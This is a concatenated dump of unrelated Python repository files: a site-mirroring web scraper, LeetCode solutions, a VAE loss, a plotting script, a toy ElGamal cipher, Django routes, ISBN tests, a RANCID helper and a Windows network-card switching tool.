requests\nimport os\nimport sys\nfrom urllib.parse import urlparse\nfrom bs4 import BeautifulSoup\n\n\nroot = \"c:/webscrape/pcgames-download.com/\"\n\n\n\n'''\n====================================================\n\n\tSystem Methods\n\n====================================================\n'''\n\n\ndef printc( str ):\n\tprint( str, end='', flush=True)\n\n\ndef printl(list):\n\tfor i in list:\n\t\tprint(i)\n\n\n'''\n====================================================\n\n\tCLASS WEB\n\n====================================================\n'''\n\nclass web:\n\n\theaders = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}\n\n\tdef __init__(self, urlDomain = \"\", localPath = \"\", code = \"\", soup = None ):\n\n\t\tself.urlDomain = urlDomain\n\t\tself.localPath = localPath\n\t\tself.code = code\n\t\tself.soup = soup \n\n\n\t#------------------------------------------------------\n\t#\tSoup\n\t#------------------------------------------------------\n\n\tdef makeSoup( self ):\n\t\tprint(\"Making Soup... \")\n\t\tself.soup = BeautifulSoup( self.code, 'html.parser')\n\n\tdef resetSoup( self ):\n\t\tprint(\"\\nReseting to Original Soup... \\n\")\n\t\tself.soup = BeautifulSoup( self.code, 'html.parser')\n\n\t#------------------------------------------------------\n\t#\tSetters\n\t#------------------------------------------------------\n\n\tdef setSoup( self, soup ):\n\t\tself.soup = soup\n\n\n\n\t#------------------------------------------------------\n\t#\tGetters\n\t#------------------------------------------------------\n\n\tdef getHtmlCode( self, url):\n\t\t\n\t\tprint(\"Downloadidng Code... \")\n\t\t\n\t\ttry:\t\t\t\n\t\t\tself.code = requests.get(url, headers = self.headers).text\n\t\t\tself.makeSoup()\n\n\t\texcept requests.exceptions.Timeout as e:\n\t\t\tprint(\"Error Timeout: \", e)\n\t\texcept requests.exceptions.ConnectionError as e:\n\t\t\tprint (\"Error Connecting: \",e)\n\t\texcept requests.exceptions.TooManyRedirects as e:\n\t\t\tprint(\"Error, too many redirects\", e)\n\t\texcept requests.exceptions.HTTPError as e:\n\t\t print(\"Http Error\", e)\n\t\texcept requests.exceptions.RequestException as e:\n\t\t\t# catastrophic error. bail.\n\t\t\tprint(e)\n\t\t\tsys.exit(1)\n\t\t\n\n\n\tdef getImgData(self, url):\n\t\t\n\t\t# get the url root ej: \"https://pcgames-download.com/\"\n\t\turlRoot = self.getDomainUrl( url )\n\n\t\turl = url.replace( urlRoot ,\"\")\n\t\tarray = url.split(\"/\")\n\t\tfolders = root +'/'.join( array[:-1] ) + \"/\"\n\t\tfilename = array[-1:][0]\n\t\t\n\t\tif \"?\" in filename: \n\t\t\tfilename = filename.split(\"?\")[0]\n\n\t\treturn (folders,filename)\n\n\n\tdef getDomainUrl(self, url):\n\t\tdata = urlparse( url )\n\t\treturn data.scheme + \"://\" + data.netloc + \"/\"\n\n\n\tdef getSoup(self):\n\t\treturn self.soup\t\t\n\n\tdef getCode(self):\n\t\treturn self.code\n\n\n\t#------------------------------------------------------\n\t#\tUtils\n\t#------------------------------------------------------\n\n\n\tdef convertToLocal( self, data ):\t\t\n\t\treturn data.replace( self.getDomainUrl( self.urlDomain ), self.localPath )\n\n\tdef createFolder( self, name ):\n\t if not os.path.exists( name ):\n\t os.makedirs( name )\n\n\t\n\t#------------------------------------------------------\n\t#\tDownloaders\n\t#------------------------------------------------------\n\n\tdef writeHtml( self, data, folder, name ):\n\n\t\tprint(\"Saving HTML... \")\n\n\t\tdata = self.convertToLocal( str( data ) )\n\n\t\tf = open( folder + name, \"w\", encoding=\"utf-8\")\n\t\tf.write( data )\n\t\tf.close()\n\n\n\tdef writeFile(self, url, folder, name ):\n\t\t\n\t\tprint(\"--> Saving File: \" + url)\n\n\t\ttry:\n\t\t\t\n\t\t\tfile = requests.get( url, headers = self.headers ).content\t\t\t\n\t\t\twith open( folder + name ,\"wb\") as f:\n\t\t\t\tf.write( file )\n\t\t\t\tf.close()\n\n\t\texcept requests.exceptions.Timeout as e:\n\t\t\tprint(\"Error Timeout: \", e)\n\t\texcept requests.exceptions.ConnectionError as e:\n\t\t\tprint (\"Error Connecting: \",e)\n\t\texcept requests.exceptions.TooManyRedirects as e:\n\t\t\tprint(\"Error, too many redirects\", e)\n\t\texcept requests.exceptions.HTTPError as e:\n\t\t print(\"Http Error\", e)\n\t\texcept requests.exceptions.RequestException as e:\n\t\t\t# catastrophic error. bail.\n\t\t\tprint(e)\n\t\t\tsys.exit(1)\n\n\n\n\n\tdef saveHtml( self, folder, name ):\n\t\tself.createFolder( folder )\t\t\n\t\tself.writeHtml( self.soup, folder, name)\n\n\n\tdef saveImages( self ):\t\t\t\n\n\t\tsoupWrapper = self.soup.findAll(\"div\", {\"class\": \"wrapper\"})[0]\t\n\n\t\tfor link in soupWrapper.select(\"img\"):\n\t\t\t\n\t\t\turlImg = link[\"src\"]\n\t\t\tfolderImg,fileName = self.getImgData(urlImg)\t\t\t\n\n\t\t\t# If file not exist\n\t\t\tif not os.path.isfile(folderImg + fileName ):\n\t\t\t\tself.createFolder( folderImg )\n\t\t\t\tself.writeFile( urlImg, folderImg, fileName )\n\n\n\t\t\t\n\tdef saveWeb( self, folderHtml, nameHtml ):\n\t\t\t\t\n\t\tdownloadHtml( folderHtml, nameHtml )\t\n\t\tdownloadImages()\n\n'''\n====================================================\n\n\tEND CLASS WEB\n\n====================================================\n'''\n\n\n\n'''\n====================================================\n\n\tCLASS pcGamesDownloads EXTEND Web\n\n====================================================\n'''\n\n# Extend for https://pcgames-download.com/\nclass pcGamesPages(web):\n\t\n\tdef __init__(self, urlDomain = \"\", localPath = \"\"):\n\t\tself.urlDomain = urlDomain\n\t\tself.localPath = localPath\n\t\n\n\t#------------------------------------------------------\n\t#\tHTML EDITIONS\n\t#------------------------------------------------------\n\n\tdef deleteTags( self ):\n\t\t\n\t\tprint(\"Editing -> Deleting Tags... \")\n\n\t\tlistDelete = []\n\n\t\t# Delete scripts tags, analytics and pops BY TEXT inside tag\t\n\t\tlistDelete.append( [self.soup.find(lambda tag:tag.name==\"script\" and \"GoogleAnalyticsObject\" in tag.text)] )\n\t\tlistDelete.append( [self.soup.find(lambda tag:tag.name==\"script\" and \"_pop\" in tag.text)] )\n\n\t\t# Delete TAG google fonts CSS\n\t\tlistDelete.append( self.soup.select(\"link[id=baskerville_googleFonts-css]\") )\t\n\n\t\t# Delete Content Layout\n\t\tlistDelete.append( self.soup.findAll(\"h3\", {\"class\": \"blog-description\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"div\", {\"class\": \"navigation\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"div\", {\"class\": \"metaslider\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"div\", {\"class\": \"sidebar\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"div\", {\"class\": \"post-meta-container\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"div\", {\"class\": \"comments\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"iframe\", {\"id\": \"mgiframe\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"div\", {\"class\": \"footer\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"div\", {\"class\": \"credits\"}) )\n\t\tlistDelete.append( self.soup.findAll(\"div\", {\"class\": \"yarpp-related\"}) )\t\t\n\t\tlistDelete.append( self.soup.findAll(\"img\", {\"class\": \"avatar\"}) )\n\n\t\t\n\t\t# DELETING TAGS\n\t\tfor listItems in listDelete:\n\t\t\tfor tag in listItems:\n\t\t\t\ttag.decompose()\n\n\n\n\n\t\t\n\n\tdef editNumNav( self ):\n\n\t\tprint(\"Editing -> Changing numbers nav menu links... \")\n\n\t\tnav = self.soup.find(\"div\", {\"class\": \"wp-pagenavi\"})\t\n\t\tbuttonsList = nav.findAll(\"a\")\n\n\t\tfor a in buttonsList:\t\t\t\n\n\t\t\tif not \"page\" in a['href']:\n\t\t\t\taUrl = root + \"page1.html\"\n\t\t\telse:\n\t\t\t\taUrl = \"page\"+a['href'].split(\"/\")[-2] + \".html\"\n\n\t\t\ta['href'] = aUrl\n\n\n\n\tdef editPostUrl( self ):\n\t\t\n\t\tprint(\"Editing -> Changing post games links... \")\n\n\t\tpostList = self.soup.find(\"div\", {\"class\": \"posts\"})\n\t\tbuttonsPosts = postList.findAll(\"a\")\n\n\t\tfor a in buttonsPosts:\n\t\t\taUrl = a['href'][:-1] + \".html\"\n\t\t\ta['href'] = aUrl\n\t\t\n\t\n\n\t#------------------------------------------------------\n\t#\tGetters and Setters\n\t#------------------------------------------------------\n\n\tdef getUrlPosts( self ):\n\t\treturn self.soup.findAll(\"a\", {\"class\": \"more-link\"})\n\n\n\tdef setNumberPage( self, n):\n\t\tself.nPage = n\n\n\t\n\t#------------------------------------------------------\n\t#\tSaving Posts\n\t#------------------------------------------------------\n\n\tdef savePosts( self ):\n\n\t\tappPost = pcGamesPages( urlDomain = \"https://pcgames-download.com/\", localPath = \"../../\")\n\n\t\tpagesList = self.getUrlPosts()\n\t\t\n\n\t\tfor gameUrlSrc in pagesList:\n\n\t\t\tgameUrl = gameUrlSrc[\"href\"]\t\t\t\n\t\t\tgameUrlData = gameUrl.replace(\"https://pcgames-download.com/\",\"\").split(\"/\")\n\t\t\t\n\t\t\tfolderPost = gameUrlData[0] + \"/\" + gameUrlData[1] + \"/\"\n\t\t\tnamePost = gameUrlData[2] + \".html\"\n\t\t\t\n\t\t\tprint( \"-\"*30+\"\\n[\"+self.nPage+\"] -> Downloading post: \" + namePost)\n\n\n\t\t\t# Create another instance for post pages\n\t\t\tappPost.getHtmlCode( gameUrl )\n\t\t\tappPost.deleteTags()\n\t\t\tappPost.saveHtml( root + folderPost, namePost )\t\n\t\t\tappPost.saveImages( )\t\n\n\t\t\tprint( \"-\"*30)\n\n\n\n'''\n====================================================\n\n\tEND CLASS PcGamesDownloads\n\n====================================================\n'''\n\n\n\n\n\ndef initCustomPcGames( ini, fin, mult):\n\n\n\tini = ini\n\tfin = fin\t\n\n\n\tdef pInit():\n\t\tprint(\"\\n\"*2 +\"=\"*80+\"\\n\" + \"\\n STARTED\\n\\n\" + \"=\"*80+ \"\\n\" )\n\t\n\tdef pEnd():\n\t\tprint(\"\\n\"*5 + \"=\"*80+\"\\n\" + \"\\n END\\n\\n\" + \"=\"*80 + \"\\n\")\n\n\tdef pPage(str):\n\t\tprint(\"\\n\"*3+\"=\"*80+\"\\n\" + \"Working page: \" + str + \"\\n\" + \"=\"*80)\n\n\n\n\tdef customSoup(soup):\n\t\tsoupPosts = soup.find(\"div\", {\"class\": \"posts\"})\n\t\tsoupPosts.clear() # Delete content from sopupTag\n\t\treturn soupPosts\n\n\n\tdef appSinlePage():\n\n\n\t\tapp = pcGamesPages( urlDomain = \"https://pcgames-download.com/\", localPath = \"\" )\n\n\n\t\tfor i in range(ini,fin+1):\n\t\t\n\t\t\ti = str(i)\n\t\t\turl = 'https://pcgames-download.com/page/' + i + '/'\n\t\t\tnamePage = \"page\" + i + \".html\"\n\n\t\t\tpPage(namePage)\t\n\n\n\t\t\t#-------------------------------------------------------\n\t\t\t# Scraping Procces\n\t\t\t#-------------------------------------------------------\n\n\t\t\t# Get html code from web\n\t\t\tapp.getHtmlCode( url )\t\t\t\n\n\t\t\t'''\n\t\t\t# Editing html\n\t\t\tapp.deleteTags()\t\t\n\t\t\tapp.editPostUrl()\n\t\t\tapp.editNumNav()\n\n\n\t\t\t# Save html and images\n\t\t\tapp.saveHtml( root, namePage)\n\t\t\tapp.saveImages()\n\n\t\t\t'''\n\t\t\t\n\t\t\t# Download all Post per page\n\t\t\t#app.resetSoup() # Reseting soup changes\n\t\t\tapp.setNumberPage(str(i))\t\t\t\n\t\t\tapp.savePosts()\n\n\n\t\t\t#-------------------------------------------------------\n\t\t\t# END Scraping Procces\n\t\t\t#-------------------------------------------------------\n\n\n\n\tdef appMultiplePageBy( mult ):\n\n\t\tmult = mult\n\t\t\n\t\tbigList = []\n\n\t\tapp = pcGamesPages( urlDomain = \"https://pcgames-download.com/\", localPath = \"\" )\n\n\t\tfor i in range(ini,fin+1):\n\t\t\n\t\t\ti = str(i)\n\t\t\turl = 'https://pcgames-download.com/page/' + i + '/'\n\t\t\tnamePage = \"page\" + i + \".html\"\n\n\t\t\tpPage(namePage)\t\n\n\n\t\t\t\n\n\t\t\t#-------------------------------------------------------\n\t\t\t# Scraping Procces\n\t\t\t#-------------------------------------------------------\n\n\t\t\t# Get html code from web\n\t\t\tapp.getHtmlCode( url )\n\n\t\t\t# save images\n\t\t\tapp.saveImages()\n\n\t\t\t#-------------------------------------------------------\n\t\t\t# END Scraping Procces\n\t\t\t#-------------------------------------------------------\n\n\n\t\t\tbigList.append( app.getSoup().findAll(\"div\", {\"class\": \"post-container\"}) )\n\n\n\t\t\t# Multiplos de 10\n\t\t\tif (int(i)%mult) == 0 or int(i) == fin:\n\n\t\t\t\tprint(\"Editing html data...\")\n\n\t\t\t\tnamePage = \"big\" + i + \".html\"\n\t\t\t\tsoupPosts = app.getSoup().find(\"div\", {\"class\": \"posts\"})\n\t\t\t\tnav = app.getSoup().find(\"div\", {\"class\": \"wp-pagenavi\"})\n\n\t\t\t\tsoupPosts.clear() # Delete content from sopupTag\n\n\n\t\t\t\tfor itemBiglist in bigList:\n\t\t\t\t\tfor itemPageBotton in itemBiglist:\n\t\t\t\t\t\tsoupPosts.append(itemPageBotton)\n\n\n\n\t\t\t\tnav.clear() # Delete content from nav\n\n\t\t\t\tfor j in range(ini,fin+1):\n\n\t\t\t\t\tj = str(j)\n\n\t\t\t\t\tif (int(j)%mult) == 0 or int(j) == fin:\n\t\t\t\t\t\tif j == i:\n\t\t\t\t\t\t\tnav.append( BeautifulSoup(''+j+'', 'html.parser') )\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnav.append( BeautifulSoup(''+j+'', 'html.parser') )\n\n\t\t\t\t\n\n\t\t\t\t# Editing html\n\t\t\t\tapp.deleteTags()\t\t\n\t\t\t\tapp.editPostUrl()\t\t\t\t\n\n\t\t\t\t# Save html and images\n\t\t\t\tapp.saveHtml( root, namePage)\n\n\t\t\t\t\n\t\t\t\tbigList = []\n\n\t\t\t\t\t\n\n\n\t\n\n\n\n\tpInit()\n\n\tappSinlePage()\n\t#appMultiplePageBy(mult)\n\n\tpEnd()\n\n\n\n\t\n\n\ninitCustomPcGames(228,296,10) #( inicio, final, multiplos ) => Multiplos sirve para unificar paginas\n","repo_name":"pixeles3ds/code","sub_path":"Python/Python Scripts/edScripts/WebScraping/webScrape.py","file_name":"webScrape.py","file_ext":"py","file_size_in_byte":11777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"552925301","text":"class Solution:\n def maxProfit(self, prices):\n \"\"\"\n :type prices: List[int]\n :rtype: int\n\n Give 1, 2, 3, 2, 4, we want to find the contineous uptrend interval,\n trade within one traction and keep find such uptrends interfvals.\n For example, 1, 2, 3 is the first uptrend interval and profit is 3 - 1 = 2 and the 2, 4 is the second uptrend and profit is 4-2=2\n Such solution is better than 4 - 1 = 3, because profits from two vally/peak pairs, better than one vally/peak pair.\n \"\"\"\n if not prices:\n return 0\n else:\n maxProfit = 0\n for i in range(1, len(prices)):\n if prices[i] > prices[i-1]:\n maxProfit += prices[i] - prices[i-1]\n return maxProfit","repo_name":"ljia2/leetcode.py","sub_path":"solutions/dp/122.Best.Time.to.Buy.and.Sell.Stock.II.py","file_name":"122.Best.Time.to.Buy.and.Sell.Stock.II.py","file_ext":"py","file_size_in_byte":796,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"1143587431","text":"from typing import Dict, Tuple\n\nimport torch\nimport torch.nn.functional as F\n\nfrom src.model.net import get_VAE_models\nfrom src.modules.base import BaseModule\n\n\nclass VAE(BaseModule):\n def get_models(self):\n return get_VAE_models(self.hparams)\n\n def get_loss(self, x: torch.Tensor) -> Tuple[torch.Tensor, Dict[str, float]]:\n z, mu, log_var = self.encoder(x)\n x_hat = self.decoder(z)\n\n recon_loss = F.mse_loss(x_hat, x, reduction=\"mean\")\n\n # see Appendix B from VAE paper:\n # Kingma and Welling. Auto-Encoding Variational Bayes. ICLR, 2014\n # https://arxiv.org/abs/1312.6114\n # 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)\n kld_loss = -0.5 * torch.sum(1 + log_var - mu ** 2 - log_var.exp(), dim=1)\n loss = recon_loss + kld_loss\n\n log = {\n \"recon_loss\": recon_loss,\n \"kld_loss\": kld_loss,\n \"loss\": loss,\n }\n return loss, log\n","repo_name":"HephaestusProject/pytorch-VAE","sub_path":"src/modules/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":953,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"19847854259","text":"import matplotlib.pyplot as mp\nimport numpy as np\nimport math\nx = np.linspace(-10,10, 100)\ny = np.sin(x)\nfont = {'family':'consolas','color':'blue','size':14}\nmp.title(\"ĐỒ THỊ Y = SIN(X)\")\nmp.xlabel(\"Trục X\", loc='right', fontdict=font)\nmp.ylabel(\"Trục Y\", loc='top', fontdict=font)\nmp.plot(x, y, marker='*', ms=10, mec='r', mfc = 'y')\nmp.show()","repo_name":"linhlukar/PYTHON","sub_path":"Python/TH6/bai62.py","file_name":"bai62.py","file_ext":"py","file_size_in_byte":354,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"34655634414","text":"_author_ = 'jake'\n_project_ = 'leetcode'\n\n# https://leetcode.com/problems/max-points-on-a-line/\n# Given n points on a 2D plane, find the maximum number of points that lie on the same straight line.\n\n# For each point, calculate the gradient of the line to all other points and store in dictionary. Python accepts\n# floats as dictionary keys and floating point accuracy is not an issue for sufficiently small x and y.\n# Infinite slopes are stored with key of 'inf'. If both x and y are the same, both points lie on all lines with the\n# first point. Calculate the max number of points on a line with each base point in turn, only considering other points\n# that have not already been the base point.\n# Time - O(n**2)\n# Space - O(n)\n\n# Definition for a point.\nclass Point(object):\n def __init__(self, a=0, b=0):\n self.x = a\n self.y = b\n\nfrom collections import defaultdict\n\nclass Solution(object):\n def maxPoints(self, points):\n \"\"\"\n :type points: List[Point]\n :rtype: int\n \"\"\"\n if len(points) <= 2:\n return len(points)\n\n overall_max = 2\n\n for i, point in enumerate(points): # for each point\n\n gradients = defaultdict(int) # key is gradient, value is nb lines involving point with this gradient\n max_points = 1 # point is on every line\n\n for point_2 in points[i+1:]: # check all\n\n if point.x == point_2.x:\n if point.y == point_2.y: # same point, on all lines\n max_points += 1\n else: # infinite gradient\n gradients['inf'] += 1\n\n else:\n gradient = (point_2.y - point.y) / float(point_2.x - point.x)\n gradients[gradient] += 1\n\n if gradients:\n max_points += max(gradients.values())\n overall_max = max(overall_max, max_points)\n\n return overall_max\n\n","repo_name":"jakehoare/leetcode","sub_path":"python_1_to_1000/149_Max_Points_on_a_Line.py","file_name":"149_Max_Points_on_a_Line.py","file_ext":"py","file_size_in_byte":2000,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"50"} +{"seq_id":"36097848245","text":"import random\n\nfrom exponent import power\n\n\ndef create_ciphertexts(public_key, block, k):\n c1 = power(public_key[1], k, public_key[0])\n # print(\"(%d^%d %% %d) = %d\" % (public_key[1], k, public_key[0], c1))\n\n c2 = (power(public_key[2], k, public_key[0])*(block % public_key[0])) % public_key[0]\n # print(\"((%d^%d %% %d)*(%d %% %d)) %% %d = %d\" % (public_key[2], k, public_key[0], block, public_key[0], public_key[0], c2))\n\n return (c1, c2)\n\n\n# Should be able to handle any length of input\ndef decrypt(ciphertexts_file, private_key):\n output = open('testfiles/dtext.txt', 'w+')\n\n plaintext = b''\n with open(ciphertexts_file, 'r') as f:\n while True:\n ciphertexts = f.readline().rsplit()\n if not ciphertexts:\n break\n ciphertexts = [int(num) for num in ciphertexts]\n # print(ciphertexts)\n first = power(ciphertexts[0], private_key[0]-1-private_key[2], private_key[0])\n second = ciphertexts[1] % private_key[0]\n result = first*second % private_key[0]\n result = result.to_bytes(4, 'big')\n\n output.write(str(result, 'ascii'))\n\n plaintext += result\n\n output.write('\\n')\n output.close()\n\n return plaintext\n\n\n# Should be able to handle any length of input\ndef encrypt(plaintext, public_key):\n output = open('testfiles/ctext.txt', 'w+')\n\n ciphertexts = []\n with open(plaintext, 'rb') as f:\n while True:\n block = f.read(4)\n if not block:\n break\n # print(block)\n block = int.from_bytes(block, 'big')\n\n k = random.randint(0, public_key[0]-1)\n\n results = create_ciphertexts(public_key, block, k)\n # print(results)\n line = ' '.join(str(ctext) for ctext in results)\n line = line + '\\n'\n output.write(line)\n\n ciphertexts.append(results[0])\n ciphertexts.append(results[1])\n\n output.close()\n\n return ciphertexts\n","repo_name":"grantlindberg4/public-key-exchange","sub_path":"crypt.py","file_name":"crypt.py","file_ext":"py","file_size_in_byte":2025,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"29755769856","text":"\nfrom django.conf.urls import url\nfrom rest_framework.urlpatterns import format_suffix_patterns\nfrom trackapp import views\n\nurlpatterns = [\n url(r'^signup_api/$', views.AdminSignUpList.as_view()),\n url(r'^signup_api/(?P[0-9]+)/$', views.SignUpDetail.as_view()),\n url(r'^signup_api/(?P\\w+)/$', views.SignUpDetail.as_view()),\n\n url(r'^si2chip/login/$', views.AdminLogin.as_view()),\n\n # urls for home.html(?P\\w+)\n url(r'^home/$', views.home, name='home'),\n\n # url for signup\n url(r'^signup/$', views.signup, name='signup'),\n\n # url for login\n url(r'^login/$', views.login, name='login'),\n url(r'^logout/$', views.logout, name='logout'),\n\n]\n\nurlpatterns = format_suffix_patterns(urlpatterns)\n\n","repo_name":"si2chip/trackmates","sub_path":"trackapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"28433053815","text":"import dataclasses\n\nimport pytest\n\nfrom dddpy.domain.book import Isbn\n\n\nclass TestIsbn:\n @pytest.mark.parametrize(\n \"value\",\n [\n (\"978-0321125217\"),\n (\"978-4-949999-12-0\"),\n ],\n )\n def test_constructor_should_create_instance(self, value):\n isbn = Isbn(value)\n\n assert isbn.value == value\n\n @pytest.mark.parametrize(\n \"value\",\n [\n (\"invalid-string\"),\n (\"123456789\"),\n (\"000-0141983479\"),\n ],\n )\n def test_constructor_should_throw_value_error_when_params_are_invalid(self, value):\n with pytest.raises(ValueError):\n Isbn(value)\n\n def test_isbn_should_be_frozen(self):\n with pytest.raises(dataclasses.FrozenInstanceError):\n isbn = Isbn(\"978-0321125217\")\n isbn.value = \"978-1141983479\" # type: ignore\n","repo_name":"iktakahiro/dddpy","sub_path":"tests/domain/book/test_isbn.py","file_name":"test_isbn.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":469,"dataset":"github-code","pt":"50"} +{"seq_id":"13156917690","text":"#!/usr/bin/env python\n\"\"\"\n Simple wrapper for creating a rancid routers.db file\n\"\"\"\nimport argparse\nimport sys\nsys.path.append('/usr/local/rancid-tools')\nimport NetdiscoDB\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser() \n parser.add_argument('-f', required = True,\n help='File location of the router.db to create')\n args = parser.parse_args()\n\n connect = NetdiscoDB.NetdiscoDB()\n connect.PrintRancidDB(args.f)\n connect.GenerateClogin()\n\n","repo_name":"msheiny/Rancid-Netdisco-Sync","sub_path":"usr/local/bin/RancidRouterDB.py","file_name":"RancidRouterDB.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"20480504559","text":"# -*- coding:utf-8 -*-\r\nimport subprocess\r\nimport time\r\nimport tkinter.messagebox\r\nfrom tkinter import messagebox\r\nimport os\r\nimport re\r\nimport win32api\r\nimport win32con\r\n\r\n\r\nf = open(\"file_path.txt\",encoding = \"utf-8\")\r\npath = f.read() # 要添加的exe路径\r\nf.close()\r\n\r\nprint('file_path:'+ path)\r\n# \"注册到启动项\"\r\ntry:\r\n runpath = \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\"\r\n hKey = win32api.RegOpenKeyEx(win32con.HKEY_CURRENT_USER, runpath, 0, win32con.KEY_SET_VALUE)\r\n # run = True\r\n # if run:\r\n # win32api.RegSetValueEx(hKey, \"MyTool\", 0, win32con.REG_SZ, path)\r\n # else:\r\n # win32api.RegDeleteValue(hKey, \"MyTool\")\r\n win32api.RegSetValueEx(hKey, \"Select_Net\", 0, win32con.REG_SZ, path)\r\n win32api.RegCloseKey(hKey)\r\nexcept Exception as e:\r\n print('开机自启动变量加入注册表错误')\r\n print(e.args)\r\n\r\n\r\np = subprocess.run('ipconfig', stdout=subprocess.PIPE, universal_newlines=True)\r\nprint(p.stdout)\r\nq =r'以太网适配器 (.*?):'\r\nslotList1 = re.findall(q, p.stdout)\r\nprint(slotList1)\r\nl =r'无线局域网适配器 (.*?):'\r\nslotList2 = re.findall(l, p.stdout)\r\nprint(slotList2)\r\nlen1=len(slotList1)\r\nnetcard1={}\r\nfor i in range(len1):\r\n print(slotList1[i])\r\n netcard1[i] = slotList1[i]\r\n print(netcard1)\r\n\r\nlen2=len(slotList2)\r\nnetcard2={}\r\nfor i in range (len2):\r\n print(slotList2[i])\r\n netcard2[i] = slotList2[i]\r\n print(netcard2)\r\n\r\nx_result_dict = {'x':\"\"}\r\n\r\ndef send1():\r\n x = \"\"\r\n for j in cheakboxs:\r\n # 如果被勾选的话传回来的值为True\r\n # 如果没有被勾选的话传回来的值为False\r\n if cheakboxs[j].get():\r\n x = x + netcard1[j] + \"\\n\"\r\n print('x:::::'+x)\r\n x_result_dict['x'] = x\r\n root.destroy()\r\n return x\r\n\r\n\r\n# 创建主窗口\r\nroot = tkinter.Tk()\r\nlabel = tkinter.Label(root, text=\"请选择使用的有线网卡\", bg=\"lightyellow\", fg=\"red\", width=50)\r\nlabel.grid(row=0)\r\n\r\ncheakboxs = {}\r\nfor i in range(len(netcard1)):\r\n cheakboxs[i] = tkinter.BooleanVar()\r\n tkinter.Checkbutton(root,text=netcard1[i], variable=cheakboxs[i]).grid(row=i + 1, sticky=tkinter.W)\r\n\r\nbuttonOne = tkinter.Button(root, text=\"提交\", width=10, command=send1)\r\nbuttonOne.grid(row=len(netcard1) + 1)\r\nroot.mainloop()\r\n\r\ny_result_dict = {'y':\"\"}\r\ndef send2():\r\n y = \"\"\r\n for j in cheakboxs:\r\n # 如果被勾选的话传回来的值为True\r\n # 如果没有被勾选的话传回来的值为False\r\n if cheakboxs[j].get():\r\n y = y + netcard2[j] + \"\\n\"\r\n print('y::::'+y)\r\n y_result_dict['y'] = y\r\n root.destroy()\r\n return y\r\n\r\n# 创建主窗口\r\nroot = tkinter.Tk()\r\nlabel = tkinter.Label(root, text=\"请选择使用的无线网卡\", bg=\"lightyellow\", fg=\"red\", width=50)\r\nlabel.grid(row=0)\r\n\r\ncheakboxs = {}\r\nfor i in range(len(netcard2)):\r\n cheakboxs[i] = tkinter.BooleanVar()\r\n # 只有被勾选才变为True\r\n tkinter.Checkbutton(root,text=netcard2[i], variable=cheakboxs[i]).grid(row=i + 1, sticky=tkinter.W)\r\n\r\nbuttonOne = tkinter.Button(root, text=\"提交\", width=10, command=send2)\r\nbuttonOne.grid(row=len(netcard2) + 1)\r\nroot.mainloop()\r\n\r\ndef send3():\r\n #开始循环运行\r\n while True:\r\n x = x_result_dict['x']\r\n y = y_result_dict['y']\r\n cmd1 = 'netsh interface show interface {}'.format(x)\r\n print('cmd1:'+cmd1)\r\n a = subprocess.check_output(cmd1, shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE)\r\n ss=str(a)\r\n time.sleep(1)\r\n print(\"未连接有线网络\")\r\n if (ss.find(u\"已连接\"))>0:\r\n print(\"已连接有线网络\")\r\n cmd2 = 'netsh interface show interface {}'.format(y)\r\n print('cmd2:' + cmd2)\r\n a = subprocess.check_output(cmd2, shell=True, stdin=subprocess.PIPE, stderr=subprocess.PIPE)\r\n ss1=str(a)\r\n if(ss1.find(u\"已连接\")) >0:\r\n print(\"已连接无线网络\")\r\n messagebox.showinfo(\"警告\", \"发生双跨,即将禁用无线网卡\")\r\n\r\n os.popen('netsh interface set interface {} admin=DISABLE'.format(y)) # 禁用无线网卡\r\n time.sleep(15)\r\n\r\n# 创建主窗口\r\nroot = tkinter.Tk()\r\nlabel = tkinter.Label(root, text=\"开始循环运行查询,轮询间隔15s\", bg=\"lightyellow\", fg=\"red\", width=50)\r\nlabel.grid(row=0)\r\n\r\nbuttonOne = tkinter.Button(root, text=\"提交\", width=10, command=send3)\r\nbuttonOne.grid(row=50)\r\nroot.mainloop()\r\n","repo_name":"jinlongyu-ikun/Python_Tkinter_Coding","sub_path":"wlan_select/testwlan.py","file_name":"testwlan.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"50"} +{"seq_id":"18205130322","text":"import os\nimport random\nimport time\n\n#Clase personaje\nclass jugador():\n\tdef __init__ (self,nombre,\n\ttipo,\n\tvida,\n\tataque,\n\telemental,\n\tdefensa,\n\tvelocidad,\n\tpCritico\n\t):\n\t\tself.nombre=nombre\n\t\tself.tipo=tipo\n\t\tself.vida=vida\n\t\tself.ataque=ataque\n\t\tself.elemental=elemental\n\t\tself.defensa=defensa\n\t\tself.velocidad=velocidad\n\t\tself.pCritico=pCritico\n\t\tself.vivo=True\n\t\t\n\tdef vive(self):\n\t\tself.vivo=False\n\t\n\tdef 